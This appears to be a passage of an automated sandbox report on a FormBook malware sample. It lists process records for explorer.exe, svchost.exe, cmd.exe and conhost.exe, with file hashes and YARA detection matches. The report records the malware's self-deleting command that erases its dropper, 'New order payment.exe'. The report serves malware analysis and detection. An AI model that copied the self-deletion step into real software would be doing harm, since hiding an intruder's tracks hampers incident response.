                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                               Reputation: low

                                                              General

                                                               Start time: 16:19:05
                                                               Start date: 27/10/2021
                                                               Path: C:\Windows\explorer.exe
                                                               Wow64 process (32bit): false
                                                               Commandline: C:\Windows\Explorer.EXE
                                                               Imagebase: 0x7ff693d90000
                                                               File size: 3933184 bytes
                                                               MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                               Has elevated privileges: true
                                                               Has administrator privileges: true
                                                               Programmed in: C, C++ or other language
                                                               Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              General

                                                              Start time:16:19:26
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\svchost.exe
                                                              Imagebase:0x9b0000
                                                              File size:44520 bytes
                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              General

                                                              Start time:16:19:31
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:/c del 'C:\Users\user\Desktop\New order payment.exe'
                                                              Imagebase:0x150000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:16:19:32
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              Code Analysis
